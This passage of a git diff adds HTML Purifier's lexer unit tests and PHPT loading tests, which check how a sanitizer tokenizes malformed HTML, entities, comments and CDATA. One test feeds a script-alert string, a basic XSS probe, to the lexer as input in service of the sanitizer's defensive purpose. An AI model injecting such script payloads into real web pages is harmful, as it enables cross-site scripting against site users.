$expect[9]->position(4, 2); + $expect[10]->position(6, 0); + + $output = $this->DirectLex->tokenizeHTML($html, $config, $context); + $this->assertIdentical($output, $expect); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLex_ErrorsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLex_ErrorsTest.php new file mode 100644 index 000000000..69d3c628d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLex_ErrorsTest.php @@ -0,0 +1,58 @@ +<?php + +class HTMLPurifier_Lexer_DirectLex_ErrorsTest extends HTMLPurifier_ErrorsHarness +{ + + function invoke($input) { + $lexer = new HTMLPurifier_Lexer_DirectLex(); + $lexer->tokenizeHTML($input, $this->config, $this->context); + } + + function invokeAttr($input) { + $lexer = new HTMLPurifier_Lexer_DirectLex(); + $lexer->parseAttributeString($input, $this->config, $this->context); + } + + function testExtractBody() { + $this->expectErrorCollection(E_WARNING, 'Lexer: Extracted body'); + $this->invoke('<body>foo</body>'); + } + + function testUnclosedComment() { + $this->expectErrorCollection(E_WARNING, 'Lexer: Unclosed comment'); + $this->expectContext('CurrentLine', 1); + $this->invoke('<!-- >'); + } + + function testUnescapedLt() { + $this->expectErrorCollection(E_NOTICE, 'Lexer: Unescaped lt'); + $this->expectContext('CurrentLine', 1); + $this->invoke('< foo>'); + } + + function testMissingGt() { + $this->expectErrorCollection(E_WARNING, 'Lexer: Missing gt'); + $this->expectContext('CurrentLine', 1); + $this->invoke('<a href=""'); + } + + // these are sub-errors, will only be thrown in context of collector + + function testMissingAttributeKey1() { + $this->expectErrorCollection(E_ERROR, 'Lexer: Missing attribute key'); + $this->invokeAttr('=""'); + } + + function testMissingAttributeKey2() { + $this->expectErrorCollection(E_ERROR, 'Lexer: Missing attribute key'); + $this->invokeAttr('foo="bar" =""'); + } + + function testMissingEndQuote() { + $this->expectErrorCollection(E_ERROR, 'Lexer: Missing end quote'); + $this->invokeAttr('src="foo'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/LexerTest.php b/lib/htmlpurifier/tests/HTMLPurifier/LexerTest.php new file mode 100644 index 000000000..42a59aeb6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/LexerTest.php @@ -0,0 +1,752 @@ +<?php + +class HTMLPurifier_LexerTest extends HTMLPurifier_Harness +{ + + protected $_has_pear = false; + + public function __construct() { + parent::__construct(); + if ($GLOBALS['HTMLPurifierTest']['PH5P']) { + require_once 'HTMLPurifier/Lexer/PH5P.php'; + } + } + + // HTMLPurifier_Lexer::create() -------------------------------------------- + + function test_create() { + $this->config->set('Core.MaintainLineNumbers', true); + $lexer = HTMLPurifier_Lexer::create($this->config); + $this->assertIsA($lexer, 'HTMLPurifier_Lexer_DirectLex'); + } + + function test_create_objectLexerImpl() { + $this->config->set('Core.LexerImpl', new HTMLPurifier_Lexer_DirectLex()); + $lexer = HTMLPurifier_Lexer::create($this->config); + $this->assertIsA($lexer, 'HTMLPurifier_Lexer_DirectLex'); + } + + function test_create_unknownLexer() { + $this->config->set('Core.LexerImpl', 'AsdfAsdf'); + $this->expectException(new HTMLPurifier_Exception('Cannot instantiate unrecognized Lexer type AsdfAsdf')); + HTMLPurifier_Lexer::create($this->config); + } + + function test_create_incompatibleLexer() { + $this->config->set('Core.LexerImpl', 'DOMLex'); + $this->config->set('Core.MaintainLineNumbers', true); + $this->expectException(new HTMLPurifier_Exception('Cannot use lexer that does not support line numbers with Core.MaintainLineNumbers or Core.CollectErrors (use DirectLex instead)')); + HTMLPurifier_Lexer::create($this->config); + } + + // HTMLPurifier_Lexer->parseData() ----------------------------------------- + + function assertParseData($input, $expect = true) { + if ($expect === true) $expect = $input; + $lexer = new HTMLPurifier_Lexer(); + $this->assertIdentical($expect, $lexer->parseData($input)); + } + + function test_parseData_plainText() { + $this->assertParseData('asdf'); + } + + function test_parseData_ampersandEntity() { + $this->assertParseData('&', '&'); + } + + function test_parseData_quotEntity() { + $this->assertParseData('"', '"'); + } + + function test_parseData_aposNumericEntity() { + $this->assertParseData(''', "'"); + } + + function test_parseData_aposCompactNumericEntity() { + $this->assertParseData(''', "'"); + } + + function test_parseData_adjacentAmpersandEntities() { + $this->assertParseData('&&&', '&&&'); + } + + function test_parseData_trailingUnescapedAmpersand() { + $this->assertParseData('&&', '&&'); + } + + function test_parseData_internalUnescapedAmpersand() { + $this->assertParseData('Procter & Gamble'); + } + + function test_parseData_improperEntityFaultToleranceTest() { + $this->assertParseData('-'); + } + + // HTMLPurifier_Lexer->extractBody() --------------------------------------- + + function assertExtractBody($text, $extract = true) { + $lexer = new HTMLPurifier_Lexer(); + $result = $lexer->extractBody($text); + if ($extract === true) $extract = $text; + $this->assertIdentical($extract, $result); + } + + function test_extractBody_noBodyTags() { + $this->assertExtractBody('<b>Bold</b>'); + } + + function test_extractBody_lowercaseBodyTags() { + $this->assertExtractBody('<html><body><b>Bold</b></body></html>', '<b>Bold</b>'); + } + + function test_extractBody_uppercaseBodyTags() { + $this->assertExtractBody('<HTML><BODY><B>Bold</B></BODY></HTML>', '<B>Bold</B>'); + } + + function test_extractBody_realisticUseCase() { + $this->assertExtractBody( +'<?xml version="1.0" +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + <head> + <title>xyz</title> + </head> + <body> + <form method="post" action="whatever1"> + <div> + <input type="text" name="username" /> + <input type="text" name="password" /> + <input type="submit" /> + </div> + </form> + </body> +</html>', + ' + <form method="post" action="whatever1"> + <div> + <input type="text" name="username" /> + <input type="text" name="password" /> + <input type="submit" /> + </div> + </form> + '); + } + + function test_extractBody_bodyWithAttributes() { + $this->assertExtractBody('<html><body bgcolor="#F00"><b>Bold</b></body></html>', '<b>Bold</b>'); + } + + function test_extractBody_preserveUnclosedBody() { + $this->assertExtractBody('<body>asdf'); // not closed, don't accept + } + + function test_extractBody_useLastBody() { + $this->assertExtractBody('<body>foo</body>bar</body>', 'foo</body>bar'); + } + + // HTMLPurifier_Lexer->tokenizeHTML() -------------------------------------- + + function assertTokenization($input, $expect, $alt_expect = array()) { + $lexers = array(); + $lexers['DirectLex'] = new HTMLPurifier_Lexer_DirectLex(); + if (class_exists('DOMDocument')) { + $lexers['DOMLex'] = new HTMLPurifier_Lexer_DOMLex(); + $lexers['PH5P'] = new HTMLPurifier_Lexer_PH5P(); + } + foreach ($lexers as $name => $lexer) { + $result = $lexer->tokenizeHTML($input, $this->config, $this->context); + if (isset($alt_expect[$name])) { + if ($alt_expect[$name] === false) continue; + $t_expect = $alt_expect[$name]; + $this->assertIdentical($result, $alt_expect[$name], "$name: %s"); + } else { + $t_expect = $expect; + $this->assertIdentical($result, $expect, "$name: %s"); + } + if ($t_expect != $result) { + printTokens($result); + } + } + } + + function test_tokenizeHTML_emptyInput() { + $this->assertTokenization('', array()); + } + + function test_tokenizeHTML_plainText() { + $this->assertTokenization( + 'This is regular text.', + array( + new HTMLPurifier_Token_Text('This is regular text.') + ) + ); + } + + function test_tokenizeHTML_textAndTags() { + $this->assertTokenization( + 'This is <b>bold</b> text', + array( + new HTMLPurifier_Token_Text('This is '), + new HTMLPurifier_Token_Start('b', array()), + new HTMLPurifier_Token_Text('bold'), + new HTMLPurifier_Token_End('b'), + new HTMLPurifier_Token_Text(' text'), + ) + ); + } + + function test_tokenizeHTML_normalizeCase() { + $this->assertTokenization( + '<DIV>Totally rad dude. <b>asdf</b></div>', + array( + new HTMLPurifier_Token_Start('DIV', array()), + new HTMLPurifier_Token_Text('Totally rad dude. '), + new HTMLPurifier_Token_Start('b', array()), + new HTMLPurifier_Token_Text('asdf'), + new HTMLPurifier_Token_End('b'), + new HTMLPurifier_Token_End('div'), + ) + ); + } + + function test_tokenizeHTML_notWellFormed() { + $this->assertTokenization( + '<asdf></asdf><d></d><poOloka><poolasdf><ds></asdf></ASDF>', + array( + new HTMLPurifier_Token_Start('asdf'), + new HTMLPurifier_Token_End('asdf'), + new HTMLPurifier_Token_Start('d'), + new HTMLPurifier_Token_End('d'), + new HTMLPurifier_Token_Start('poOloka'), + new HTMLPurifier_Token_Start('poolasdf'), + new HTMLPurifier_Token_Start('ds'), + new HTMLPurifier_Token_End('asdf'), + new HTMLPurifier_Token_End('ASDF'), + ), + array( + 'DOMLex' => $alt = array( + new HTMLPurifier_Token_Empty('asdf'), + new HTMLPurifier_Token_Empty('d'), + new HTMLPurifier_Token_Start('pooloka'), + new HTMLPurifier_Token_Start('poolasdf'), + new HTMLPurifier_Token_Empty('ds'), + new HTMLPurifier_Token_End('poolasdf'), + new HTMLPurifier_Token_End('pooloka'), + ), + 'PH5P' => $alt, + ) + ); + } + + function test_tokenizeHTML_whitespaceInTag() { + $this->assertTokenization( + '<a'."\t".'href="foobar.php"'."\n".'title="foo!">Link to <b id="asdf">foobar</b></a>', + array( + new HTMLPurifier_Token_Start('a',array('href'=>'foobar.php','title'=>'foo!')), + new HTMLPurifier_Token_Text('Link to '), + new HTMLPurifier_Token_Start('b',array('id'=>'asdf')), + new HTMLPurifier_Token_Text('foobar'), + new HTMLPurifier_Token_End('b'), + new HTMLPurifier_Token_End('a'), + ) + ); + } + + function test_tokenizeHTML_singleAttribute() { + $this->assertTokenization( + '<br style="&" />', + array( + new HTMLPurifier_Token_Empty('br', array('style' => '&')) + ) + ); + } + + function test_tokenizeHTML_emptyTag() { + $this->assertTokenization( + '<br />', + array( new HTMLPurifier_Token_Empty('br') ) + ); + } + + function test_tokenizeHTML_comment() { + $this->assertTokenization( + '<!-- Comment -->', + array( new HTMLPurifier_Token_Comment(' Comment ') ) + ); + } + + function test_tokenizeHTML_malformedComment() { + $this->assertTokenization( + '<!-- not so well formed --->', + array( new HTMLPurifier_Token_Comment(' not so well formed -') ) + ); + } + + function test_tokenizeHTML_unterminatedTag() { + $this->assertTokenization( + '<a href=""', + array( new HTMLPurifier_Token_Text('<a href=""') ), + array( + // I like our behavior better, but it's non-standard + 'DOMLex' => array( new HTMLPurifier_Token_Empty('a', array('href'=>'')) ), + 'PH5P' => false, // total barfing, grabs scaffolding too + ) + ); + } + + function test_tokenizeHTML_specialEntities() { + $this->assertTokenization( + '<b>', + array( + new HTMLPurifier_Token_Text('<b>') + ), + array( + // some parsers will separate entities out + 'PH5P' => array( + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('b'), + new HTMLPurifier_Token_Text('>'), + ), + ) + ); + } + + function test_tokenizeHTML_earlyQuote() { + $this->assertTokenization( + '<a "=>', + array( new HTMLPurifier_Token_Empty('a') ), + array( + // we barf on this input + 'DirectLex' => array( + new HTMLPurifier_Token_Start('a', array('"' => '')) + ), + 'PH5P' => false, // behavior varies; handle this personally + ) + ); + } + + function test_tokenizeHTML_earlyQuote_PH5P() { + if (!class_exists('DOMDocument')) return; + $lexer = new HTMLPurifier_Lexer_PH5P(); + $result = $lexer->tokenizeHTML('<a "=>', $this->config, $this->context); + if ($this->context->get('PH5PError', true)) { + $this->assertIdentical(array( + new HTMLPurifier_Token_Start('a', array('"' => '')) + ), $result); + } else { + $this->assertIdentical(array( + new HTMLPurifier_Token_Empty('a', array('"' => '')) + ), $result); + } + } + + function test_tokenizeHTML_unescapedQuote() { + $this->assertTokenization( + '"', + array( new HTMLPurifier_Token_Text('"') ) + ); + } + + function test_tokenizeHTML_escapedQuote() { + $this->assertTokenization( + '"', + array( new HTMLPurifier_Token_Text('"') ) + ); + } + + function test_tokenizeHTML_cdata() { + $this->assertTokenization( + '<![CDATA[You <b>can't</b> get me!]]>', + array( new HTMLPurifier_Token_Text('You <b>can't</b> get me!') ), + array( + 'PH5P' => array( + new HTMLPurifier_Token_Text('You '), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('b'), + new HTMLPurifier_Token_Text('>'), + new HTMLPurifier_Token_Text('can'), + new HTMLPurifier_Token_Text('&'), + new HTMLPurifier_Token_Text('#39;t'), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('/b'), + new HTMLPurifier_Token_Text('>'), + new HTMLPurifier_Token_Text(' get me!'), + ), + ) + ); + } + + function test_tokenizeHTML_characterEntity() { + $this->assertTokenization( + 'θ', + array( new HTMLPurifier_Token_Text("\xCE\xB8") ) + ); + } + + function test_tokenizeHTML_characterEntityInCDATA() { + $this->assertTokenization( + '<![CDATA[→]]>', + array( new HTMLPurifier_Token_Text("→") ), + array( + 'PH5P' => array( + new HTMLPurifier_Token_Text('&'), + new HTMLPurifier_Token_Text('rarr;'), + ), + ) + ); + } + + function test_tokenizeHTML_entityInAttribute() { + $this->assertTokenization( + '<a href="index.php?title=foo&id=bar">Link</a>', + array( + new HTMLPurifier_Token_Start('a',array('href' => 'index.php?title=foo&id=bar')), + new HTMLPurifier_Token_Text('Link'), + new HTMLPurifier_Token_End('a'), + ) + ); + } + + function test_tokenizeHTML_preserveUTF8() { + $this->assertTokenization( + "\xCE\xB8", + array( new HTMLPurifier_Token_Text("\xCE\xB8") ) + ); + } + + function test_tokenizeHTML_specialEntityInAttribute() { + $this->assertTokenization( + '<br test="x < 6" />', + array( new HTMLPurifier_Token_Empty('br', array('test' => 'x < 6')) ) + ); + } + + function test_tokenizeHTML_emoticonProtection() { + $this->assertTokenization( + '<b>Whoa! <3 That\'s not good >.></b>', + array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('Whoa! '), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('3 That\'s not good >.>'), + new HTMLPurifier_Token_End('b') + ), + array( + // text is absorbed together + 'DOMLex' => array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('Whoa! <3 That\'s not good >.>'), + new HTMLPurifier_Token_End('b'), + ), + 'PH5P' => array( // interesting grouping + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('Whoa! '), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('3 That\'s not good >.>'), + new HTMLPurifier_Token_End('b'), + ), + ) + ); + } + + function test_tokenizeHTML_commentWithFunkyChars() { + $this->assertTokenization( + '<!-- This >< comment --><br />', + array( + new HTMLPurifier_Token_Comment(' This >< comment '), + new HTMLPurifier_Token_Empty('br'), + ) + ); + } + + function test_tokenizeHTML_unterminatedComment() { + $this->assertTokenization( + '<!-- This >< comment', + array( new HTMLPurifier_Token_Comment(' This >< comment') ), + array( + 'DOMLex' => false, + 'PH5P' => false, + ) + ); + } + + function test_tokenizeHTML_scriptCDATAContents() { + $this->config->set('HTML.Trusted', true); + $this->assertTokenization( + 'Foo: <script>alert("<foo>");</script>', + array( + new HTMLPurifier_Token_Text('Foo: '), + new HTMLPurifier_Token_Start('script'), + new HTMLPurifier_Token_Text('alert("<foo>");'), + new HTMLPurifier_Token_End('script'), + ), + array( + // PH5P, for some reason, bubbles the script to <head> + 'PH5P' => false, + ) + ); + } + + function test_tokenizeHTML_entitiesInComment() { + $this->assertTokenization( + '<!-- This comment < < & -->', + array( new HTMLPurifier_Token_Comment(' This comment < < & ') ) + ); + } + + function test_tokenizeHTML_attributeWithSpecialCharacters() { + $this->assertTokenization( + '<a href="><>">', + array( new HTMLPurifier_Token_Empty('a', array('href' => '><>')) ), + array( + 'DirectLex' => array( + new HTMLPurifier_Token_Start('a', array('href' => '')), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('">'), + ) + ) + ); + } + + function test_tokenizeHTML_emptyTagWithSlashInAttribute() { + $this->assertTokenization( + '<param name="src" value="http://example.com/video.wmv" />', + array( new HTMLPurifier_Token_Empty('param', array('name' => 'src', 'value' => 'http://example.com/video.wmv')) ) + ); + } + + function test_tokenizeHTML_style() { + $extra = array( + // PH5P doesn't seem to like style tags + 'PH5P' => false, + // DirectLex defers to RemoveForeignElements for textification + 'DirectLex' => array( + new HTMLPurifier_Token_Start('style', array('type' => 'text/css')), + new HTMLPurifier_Token_Comment("\ndiv {}\n"), + new HTMLPurifier_Token_End('style'), + ), + ); + if (!defined('LIBXML_VERSION')) { + // LIBXML_VERSION is missing in early versions of PHP + // prior to 1.30 of php-src/ext/libxml/libxml.c (version-wise, + // this translates to 5.0.x. In such cases, punt the test entirely. + return; + } elseif (LIBXML_VERSION < 20628) { + // libxml's behavior is wrong prior to this version, so make + // appropriate accomodations + $extra['DOMLex'] = $extra['DirectLex']; + } + $this->assertTokenization( +'<style type="text/css"><!-- +div {} +--></style>', + array( + new HTMLPurifier_Token_Start('style', array('type' => 'text/css')), + new HTMLPurifier_Token_Text("\ndiv {}\n"), + new HTMLPurifier_Token_End('style'), + ), + $extra + ); + } + + function test_tokenizeHTML_tagWithAtSignAndExtraGt() { + $alt_expect = array( + // Technically this is invalid, but it won't be a + // problem with invalid element removal; also, this + // mimics Mozilla's parsing of the tag. + new HTMLPurifier_Token_Start('a@'), + new HTMLPurifier_Token_Text('>'), + ); + $this->assertTokenization( + '<a@>>', + array( + new HTMLPurifier_Token_Start('a'), + new HTMLPurifier_Token_Text('>'), + new HTMLPurifier_Token_End('a'), + ), + array( + 'DirectLex' => $alt_expect, + ) + ); + } + + function test_tokenizeHTML_emoticonHeart() { + $this->assertTokenization( + '<br /><3<br />', + array( + new HTMLPurifier_Token_Empty('br'), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('3'), + new HTMLPurifier_Token_Empty('br'), + ), + array( + 'DOMLex' => array( + new HTMLPurifier_Token_Empty('br'), + new HTMLPurifier_Token_Text('<3'), + new HTMLPurifier_Token_Empty('br'), + ), + ) + ); + } + + function test_tokenizeHTML_emoticonShiftyEyes() { + $this->assertTokenization( + '<b><<</b>', + array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_End('b'), + ), + array( + 'DOMLex' => array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('<<'), + new HTMLPurifier_Token_End('b'), + ), + ) + ); + } + + function test_tokenizeHTML_eon1996() { + $this->assertTokenization( + '< <b>test</b>', + array( + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text(' '), + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('test'), + new HTMLPurifier_Token_End('b'), + ), + array( + 'DOMLex' => array( + new HTMLPurifier_Token_Text('< '), + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('test'), + new HTMLPurifier_Token_End('b'), + ), + ) + ); + } + + function test_tokenizeHTML_bodyInCDATA() { + $alt_tokens = array( + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('body'), + new HTMLPurifier_Token_Text('>'), + new HTMLPurifier_Token_Text('Foo'), + new HTMLPurifier_Token_Text('<'), + new HTMLPurifier_Token_Text('/body'), + new HTMLPurifier_Token_Text('>'), + ); + $this->assertTokenization( + '<![CDATA[<body>Foo</body>]]>', + array( + new HTMLPurifier_Token_Text('<body>Foo</body>'), + ), + array( + 'PH5P' => $alt_tokens, + ) + ); + } + + function test_tokenizeHTML_() { + $this->assertTokenization( + '<a><img /></a>', + array( + new HTMLPurifier_Token_Start('a'), + new HTMLPurifier_Token_Empty('img'), + new HTMLPurifier_Token_End('a'), + ) + ); + } + + function test_tokenizeHTML_ignoreIECondComment() { + $this->assertTokenization( + '<!--[if IE]>foo<a>bar<!-- baz --><![endif]-->', + array() + ); + } + + function test_tokenizeHTML_removeProcessingInstruction() { + $this->config->set('Core.RemoveProcessingInstructions', true); + $this->assertTokenization( + '<?xml blah blah ?>', + array() + ); + } + + function test_tokenizeHTML_removeNewline() { + $this->config->set('Core.NormalizeNewlines', true); + $this->assertTokenization( + "plain\rtext\r\n", + array( + new HTMLPurifier_Token_Text("plain\ntext\n") + ) + ); + } + + function test_tokenizeHTML_noRemoveNewline() { + $this->config->set('Core.NormalizeNewlines', false); + $this->assertTokenization( + "plain\rtext\r\n", + array( + new HTMLPurifier_Token_Text("plain\rtext\r\n") + ) + ); + } + + function test_tokenizeHTML_conditionalCommentUngreedy() { + $this->assertTokenization( + '<!--[if gte mso 9]>a<![endif]-->b<!--[if gte mso 9]>c<![endif]-->', + array( + new HTMLPurifier_Token_Text("b") + ) + ); + } + + function test_tokenizeHTML_imgTag() { + $start = array( + new HTMLPurifier_Token_Start('img', + array( + 'src' => 'img_11775.jpg', + 'alt' => '[Img #11775]', + 'id' => 'EMBEDDED_IMG_11775', + ) + ) + ); + $this->assertTokenization( + '<img src="img_11775.jpg" alt="[Img #11775]" id="EMBEDDED_IMG_11775" >', + array( + new HTMLPurifier_Token_Empty('img', + array( + 'src' => 'img_11775.jpg', + 'alt' => '[Img #11775]', + 'id' => 'EMBEDDED_IMG_11775', + ) + ) + ), + array( + 'DirectLex' => $start, + ) + ); + } + + + /* + + function test_tokenizeHTML_() { + $this->assertTokenization( + , + array( + + ) + ); + } + */ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/domxml.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/domxml.phpt new file mode 100644 index 000000000..406ac400b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/domxml.phpt @@ -0,0 +1,15 @@ +--TEST-- +DirectLex with domxml test +--SKIPIF-- +<?php +if (!extension_loaded('dom')) { + echo "skip - dom not available"; +} elseif (!extension_loaded('domxml')) { + echo "skip - domxml not loaded"; +} +--FILE-- +<?php +require '../library/HTMLPurifier.auto.php'; +echo get_class(HTMLPurifier_Lexer::create(HTMLPurifier_Config::createDefault())); +--EXPECT-- +HTMLPurifier_Lexer_DirectLex
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/func.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/func.phpt new file mode 100644 index 000000000..d194d68d3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/func.phpt @@ -0,0 +1,9 @@ +--TEST-- +HTMLPurifier.func.php test +--FILE-- +<?php +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier.func.php'; +echo HTMLPurifier('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/kses/basic.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/kses/basic.phpt new file mode 100644 index 000000000..8a9cd0162 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/kses/basic.phpt @@ -0,0 +1,15 @@ +--TEST-- +HTMLPurifier.kses.php basic test +--FILE-- +<?php +require '../library/HTMLPurifier.kses.php'; +echo kses( + '<a class="foo" style="color:#F00;" href="https://google.com">Foo<i>Bar</i>', + array( + 'a' => array('class' => 1, 'href' => 1), + ), + array('http') // no https! +); + +--EXPECT-- +<a class="foo">FooBar</a>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_autoload.inc b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_autoload.inc new file mode 100644 index 000000000..42e3500e4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_autoload.inc @@ -0,0 +1,12 @@ +<?php + +/** + * Tests if autoloading for HTML Purifier is enabled. If all tests pass, + * output is blank. + */ + +assert("!in_array(realpath('../library/HTMLPurifier/Filter/YouTube.php'), get_included_files())"); +new HTMLPurifier_Filter_YouTube(); +assert(" in_array(realpath('../library/HTMLPurifier.autoload.php'), get_included_files())"); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_no-autoload.inc b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_no-autoload.inc new file mode 100644 index 000000000..fc109e727 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/_no-autoload.inc @@ -0,0 +1,17 @@ +<?php + +/** + * Tests if autoloading is off in HTML Purifier. If all tests pass, no output. + */ + +if (function_exists('spl_autoload_register')) { + $__v = spl_autoload_functions(); + assert('$__v == false || !in_array(array("HTMLPurifier_Bootstrap", "autoload"), $__v)'); +} else { + if (function_exists('__autoload')) { + $__r = new ReflectionFunction('__autoload'); + assert('$__r->getFileName() != realpath("../library/HTMLPurifier.autoload.php")'); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-includes.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-includes.phpt new file mode 100644 index 000000000..6a8f909b8 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-includes.phpt @@ -0,0 +1,12 @@ +--TEST-- +HTMLPurifier.auto.php and HTMLPurifier.includes.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.path.php'; +require 'HTMLPurifier.includes.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-autoload.phpt new file mode 100644 index 000000000..aad437202 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-autoload.phpt @@ -0,0 +1,28 @@ +--TEST-- +HTMLPurifier.auto.php using spl_autoload_register with __autoload() already defined loading test +--SKIPIF-- +<?php +if (!function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() not available"; +} +--FILE-- +<?php +function __autoload($class) { + echo "Autoloading $class... +"; + eval("class $class {}"); +} + +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!') . " +"; + +// purposely invoke older autoload +$bar = new Bar(); + +--EXPECT-- +<b>Salsa!</b> +Autoloading Bar...
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload-default.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload-default.phpt new file mode 100644 index 000000000..a4011f1d3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload-default.phpt @@ -0,0 +1,25 @@ +--TEST-- +HTMLPurifier.auto.php using spl_autoload_register default +--SKIPIF-- +<?php +if (!function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() not available"; +} +--FILE-- +<?php +spl_autoload_extensions(".php"); +spl_autoload_register(); + +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!') . " +"; + +// purposely invoke standard autoload +$test = new default_load(); + +--EXPECT-- +<b>Salsa!</b> +Default loaded diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload.phpt new file mode 100644 index 000000000..1697bb13f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-with-spl-autoload.phpt @@ -0,0 +1,43 @@ +--TEST-- +HTMLPurifier.auto.php using spl_autoload_register with user registration loading test +--SKIPIF-- +<?php +if (!function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() not available"; +} +--FILE-- +<?php +function my_autoload($class) { + echo "Autoloading $class... +"; + eval("class $class {}"); + return true; +} +class MyClass { + public static function myAutoload($class) { + if ($class == 'Foo') { + echo "Special autoloading Foo... +"; + eval("class $class {}"); + } + } +} + +spl_autoload_register(array('MyClass', 'myAutoload')); +spl_autoload_register('my_autoload'); + +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!') . " +"; + +// purposely invoke older autoloads +$foo = new Foo(); +$bar = new Bar(); + +--EXPECT-- +<b>Salsa!</b> +Special autoloading Foo... +Autoloading Bar...
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-autoload.phpt new file mode 100644 index 000000000..aeee9dcee --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-autoload.phpt @@ -0,0 +1,19 @@ +--TEST-- +HTMLPurifier.auto.php without spl_autoload_register without userland autoload loading test +--SKIPIF-- +<?php +if (function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() available"; +} +--FILE-- +<?php +assert("!function_exists('__autoload')"); +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!') . " +"; + +--EXPECT-- +<b>Salsa!</b>
